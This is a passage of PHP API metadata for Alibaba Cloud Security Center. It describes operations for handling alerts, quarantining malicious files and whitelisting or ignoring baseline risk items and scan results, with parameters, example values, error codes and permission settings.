Equals.'."\n" .'- **str_not_equal**: Does not equal.'."\n" .'- **regex**: Regular expression.', 'type' => 'string', 'required' => false, 'example' => 'contains', 'title' => ''], 'Value' => ['description' => 'The value to match.', 'type' => 'string', 'required' => false, 'example' => 'sshe', 'title' => ''], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'EventIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of event IDs.', 'type' => 'array', 'items' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '42799634', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '0614B89B-1CA9-50B2-A89A-2C66BB32B801'], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Handle malicious file detection alerts', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:HandleObjectScanEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0614B89B-1CA9-50B2-A89A-2C66BB32B801\\"\\n}","type":"json"}]', ], 'HandleSecurityEvents' => [ 'summary' => 'Handles alert events.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92316', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'OperationCode', 'in' => 'query', 'schema' => ['description' => 'The operation that you want to perform to handle the alert events. Valid values:'."\n" ."\n" .'* **block_ip**: blocks the source IP address.'."\n" .'* **advance\\_mark\\_mis_info**: adds the alert events to the whitelist.'."\n" .'* **ignore**: ignores the alert events.'."\n" .'* **manual_handled**: marks the alert events as manually handled.'."\n" .'* **kill_process**: terminates the malicious process.'."\n" .'* **cleanup**: performs in-depth virus detection and removal.'."\n" .'* **kill\\_and_quara**: kills the malicious processes and quarantines the source file.'."\n" .'* **disable\\_malicious_defense**: stops the container on which the alerting files or processes exist.'."\n" .'* **client\\_problem_check**: performs troubleshooting.'."\n" .'* **quara**: quarantines the source file of the malicious process.', 'type' => 'string', 'required' => true, 'example' => 'block_ip', 'title' => ''], ], [ 'name' => 'OperationParams', 'in' => 'query', 'schema' => ['description' => 'The configuration of the operation that you want to perform to handle the alert events.'."\n" ."\n" .'> If you set OperationCode to `kill_and_quara` or `block_ip`, you must specify OperationParams. If you set OperationCode to other values, you can leave OperationParams empty.'."\n", 'type' => 'string', 'required' => false, 'example' => '{\\"expireTime\\":1719588943551,\\"subOperation\\":\\"killAndQuaraFileByMd5andPath\\"}', 'title' => ''], ], [ 'name' => 'MarkMissParam', 'in' => 'query', 'schema' => ['description' => 'The whitelist rule. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **field**: The field based on which alert events are added to the whitelist.'."\n" ."\n" .'* **operate**: The method that is used to added alert events to the whitelist. Valid values:'."\n" ."\n" .' * **notContains**: does not contain'."\n" .' * **contains**: contains'."\n" .' * **regex**: matches by regular expression'."\n" .' * **strEqual**: equals'."\n" .' * **strNotEqual**: does not equal'."\n" ."\n" .'* **fieldValue**: The value of the field based on which alert events are added to the whitelist.'."\n" ."\n" .'* **uuid**: The application scope of the whitelist rule. Valid values:'."\n" ."\n" .' * **part**: the current asset'."\n" .' * **ALL**: all assets'."\n" ."\n" .'> You can call the [DescribeSecurityEventOperations](~~DescribeSecurityEventOperations~~) operation to obtain the fields that you can specify for **field**.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"uuid":"part","field":"gmtModified","operate":"contains","fieldValue":"asd"},{"uuid":"part","field":"loginUser","operate":"contains","fieldValue":"vff"}]', 'title' => ''], ], [ 'name' => 'MarkBatch', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to add multiple alert events to the whitelist at a time. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'string', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'SecurityEventIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the alert event.'."\n", 'type' => 'string', 'required' => true, 'example' => '909361', 'title' => ''], 'required' => true, 'example' => '["909361"]', 'maxItems' => 100, 'title' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks of the handling operation.'."\n", 'type' => 'string', 'required' => false, 'example' => 'remark test.', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '127608589417****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'FF0020B9-999F-5DE2-985F-DB282BDA5311', 'title' => ''], 'HandleSecurityEventsResponse' => [ 'description' => 'The handling result of the alert events.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the task to handle the alert events.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '15411', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'SecurityEventNotExists', 'errorMessage' => 'Security event not exists.', 'description' => ''], ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"FF0020B9-999F-5DE2-985F-DB282BDA5311\\",\\n \\"HandleSecurityEventsResponse\\": {\\n \\"TaskId\\": 15411\\n }\\n}","errorExample":""},{"type":"xml","example":"FF0020B9-999F-5DE2-985F-DB282BDA5311\\n\\n 15411\\n","errorExample":""}]', 'title' => 'HandleSecurityEvents', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleSecurityEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:HandleSecurityEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'HandleSimilarMaliciousFiles' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '251677', 'abilityTreeNodes' => ['FEATUREsasON13NY'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Scenario', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The batch processing scenario. Valid values:'."\n" .'- same_file_md5: same file MD5.'."\n" .'- default (default value): same alerting type.', 'type' => 'string', 'required' => false, 'example' => 'same_file_md5'], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The handling action. Valid values:'."\n" .'- addWhitelist: adds to the whitelist.'."\n" .'- offWhitelist: removes from the whitelist.'."\n" .'- offline_handled: handled offline.'."\n" .'- mark_mis_info: submits as a false positive.'."\n" .'- ignore: ignores the alert.', 'type' => 'string', 'required' => true, 'example' => 'ignore'], ], [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the target alert.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123'], ], [ 'name' => 'ScanRange', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The file source. Valid values:'."\n" .'- agentless: host detection.'."\n" .'- ecs_snapshot: user snapshot detection.'."\n" .'- ecs_image: user custom image detection.', 'type' => 'string', 'required' => false, 'example' => 'agentless'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The number of alerts that are batch processed.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The China value is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '8C376***AE74FB4', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Batch process malicious sample alerts', 'summary' => 'Batch processes malicious sample alerts.', 'description' => '****.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleSimilarMaliciousFiles'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:HandleSimilarMaliciousFiles', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": 1,\\n \\"RequestId\\": \\"8C376***AE74FB4\\"\\n}","type":"json"}]', ], 'HandleSimilarSecurityEvents' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92317', 'abilityTreeNodes' => ['FEATUREsas731ZAS'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the task that batch processes all alert events of the same type.'."\n" .'>Call the [CreateSimilarSecurityEventsQueryTask](~~CreateSimilarSecurityEventsQueryTask~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '666038', 'title' => ''], ], [ 'name' => 'OperationCode', 'in' => 'query', 'schema' => ['description' => 'The type of operation for batch processing alert events of the same type.'."\n" .'>Call the [DescribeSecurityEventOperations](~~DescribeSecurityEventOperations~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'offline_handled', 'title' => ''], ], [ 'name' => 'OperationParams', 'in' => 'query', 'schema' => ['description' => 'The configuration of the sub-operation for handling alerting events. The value is in JSON format.'."\n" ."\n" .'> This parameter is required when **OperationCode** is set to **kill\\_and\\_quara**, **block\\_ip**, or **virus\\_quara**. For other values of **OperationCode**, this parameter can be left empty.'."\n" ."\n" .'> When **OperationCode** is set to **block_ip**, the following field is included:'."\n" .'> - **expireTime**: the lock expiration time. Unit: milliseconds.'."\n" .'>'."\n" .'> When **OperationCode** is set to **kill\\_and\\_quara**, the following field is included:'."\n" .'> - **subOperation**: the method used to scan and remove threats. Valid values:'."\n" .'> - **killAndQuaraFileByMd5andPath**: terminates the process and moves the file to the quarantined file.'."\n" .'> - **killByMd5andPath**: terminates the running process.'."\n" .'>'."\n" .'> When **OperationCode** is set to **virus\\_quara**, the following field is included:'."\n" .'> - **subOperation**: the method used to scan and remove threats. Valid values:'."\n" .'> - **quaraFileByMd5andPath**: moves the source file of the process to the quarantined file.', 'type' => 'string', 'required' => false, 'example' => '{"expireTime":1646208726195}', 'title' => ''], ], [ 'name' => 'MarkMissParam', 'in' => 'query', 'schema' => ['description' => 'The rule for adding items to the whitelist. For example, to add a whitelist rule based on file MD5 where the file contains the string "a", set this parameter to {"field":"md5","operate":"contains","fieldValue":"aa"}.', 'type' => 'string', 'required' => false, 'example' => '{"field":"md5","operate":"contains","fieldValue":"aa"}', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks for the operation.', 'type' => 'string', 'required' => false, 'example' => 'remark test.', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A3653911-33A6-5268-8B91-7690471F7AA1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataRetrieveNotFinished', 'errorMessage' => 'Data retrieving not finished yet', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'OperationTaskNotExists', 'errorMessage' => 'The specified operation task does not exist', 'description' => ''], ['errorCode' => 'MissingTaskId', 'errorMessage' => 'Task id is mandatory for this action.', 'description' => ''], ['errorCode' => 'InvalidOperationForEvent', 'errorMessage' => 'The operation is invalid for the event.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Batch process alert events based on the same IP rule or type', 'summary' => 'Batch processes alert events based on the same IP rule or type.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleSimilarSecurityEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:HandleSimilarSecurityEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A3653911-33A6-5268-8B91-7690471F7AA1\\"\\n}","type":"json"}]', ], 'HandleUnknownThreatDetectEvent' => [ 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], ], 'parameters' => [ [ 'name' => 'EventIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of event IDs.', 'type' => 'array', 'items' => ['description' => 'The list of event IDs.', 'type' => 'string', 'required' => false, 'example' => '43029368', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The event handling status. Valid values:'."\n" ."\n" .'- **1**: Unhandled.'."\n" .'- **2**: Blocked.'."\n" .'- **3**: Ignored.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '6EBB8614-746D-555D-AB69-C801AE******'], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Handle intelligent behavior analytics alerting', 'summary' => 'Handles alerting from intelligent behavior analytics.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:HandleUnknownThreatDetectEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6EBB8614-746D-555D-AB69-C801AE******\\"\\n}","type":"json"}]', ], 'IgnoreCheckItems' => [ 'summary' => 'Adds risk items to the whitelist or removes risk items from the whitelist by specifying servers and risk items.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '141289', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The UUIDs of the servers.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '55bf7984-9b3b-4e8d-be8e-f3e5b0b4****', 'title' => ''], 'required' => false, 'maxItems' => 50, 'example' => '', ], ], [ 'name' => 'CheckAndRiskTypeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The information about check items.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The risk item.'."\n", 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the check item.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '52', 'title' => ''], 'RiskType' => ['description' => 'The baseline type of the check item.'."\n", 'type' => 'string', 'required' => false, 'example' => 'weak_password', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 50, 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The operation that you want to perform on the risk item.Valid values:'."\n" .'* **1**: adds the risk item to the whitelist'."\n" .'* **2**: removes the risk item from the whitelist', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1'], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The reason why you add the risk item to the whitelist.'."\n", 'type' => 'string', 'required' => false, 'example' => 'already config in another way'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Valid values:'."\n" ."\n" .'* **default**: host baseline'."\n" .'* **agentless**: agentless baseline'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of check items.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [DescribeCheckWarnings](~~116182~~) operation to query the IDs of check items.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'ContainerItems', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'List of container names that need to be whitelisted.', 'type' => 'array', 'items' => [ 'description' => 'Name of the container to be whitelisted.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '14eb2fb6-ab02-4869-a1e1-2cdb0f7*****', 'title' => ''], 'ContainerNames' => ['description' => 'The names of the containers that need to be whitelisted for the current asset, separated by English commas.', 'type' => 'string', 'required' => false, 'example' => '"anythingllm,ChuanhuChat"', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '11EBEC99-B4B5-542E-8C17-B87B624C****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"11EBEC99-B4B5-542E-8C17-B87B624C****\\"\\n}","type":"json"}]', 'title' => 'IgnoreCheckItems', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'IgnoreCheckItems'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:IgnoreCheckItems', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'IgnoreHcCheckWarnings' => [ 'summary' => 'Ignores or cancels ignoring multiple baseline risk items at a time.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => true, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92318', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], ], [ 'name' => 'CheckWarningIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert that is triggered by the check item. Separate multiple IDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCheckWarnings](~~116182~~) operation to query the IDs of alerts that are triggered by check items.'."\n", 'type' => 'string', 'required' => false, 'example' => '98146905,98146907', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [DescribeCheckWarnings](~~116182~~) operation to query the IDs of check items.'."\n", 'type' => 'string', 'required' => false, 'example' => '21313', 'title' => ''], ], [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the risk item that you want to ignore or cancel ignoring.'."\n" ."\n" .'> You can call the [DescribeCheckWarningSummary](~~116179~~) operation to query the IDs of risk items.'."\n", 'type' => 'string', 'required' => false, 'example' => '51', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the operation that you want to perform. Valid values:'."\n" ."\n" .'* **1**: ignores a risk item'."\n" .'* **2**: cancels ignoring a risk item'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason for the current operation.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ignore', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. If this parameter is left empty, the server baseline results are queried by default. Valid values:'."\n" .'* **default**: server'."\n" .'* **agentless**', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B113119F', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::IgnoreCheckItems'], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B113119F\\"\\n}","errorExample":""},{"type":"xml","example":"\\r\\n 7E0618A9-D5EF-4220-9471-C42B113119F\\r\\n","errorExample":""}]', 'title' => 'IgnoreHcCheckWarnings', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'IgnoreHcCheckWarnings'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:IgnoreHcCheckWarnings', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'IgnoreIdcProbeScanResult' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none', 'tenantRelevance' => 'publicInformation'], 'parameters' => [ [ 'name' => 'ScanResultIds', 'in' => 'query', 'schema' => ['description' => 'The IDs of scan results. Separate multiple IDs with commas (,).'."\n" ."\n" .'> Call the [DescribeIdcProbeScanResultList](~~DescribeIdcProbeScanResultList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '332098932,332098964,332098963', 'title' => ''], ], [ 'name' => 'IgnoreAction', 'in' => 'query', 'schema' => ['description' => 'The action to perform. Valid values:'."\n" .'- **1**: whitelist'."\n" .'- **2**: ignore.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'E30282D8-AB2D-5EB1-998B-2DDFA948D49D', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Whitelist or ignore IDC probe scan results', 'summary' => 'Adds scan results from IDC probes to the whitelist or ignores them.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'IgnoreIdcProbeScanResult'], ], 'product' => ['code' => 'sas', 'title' => 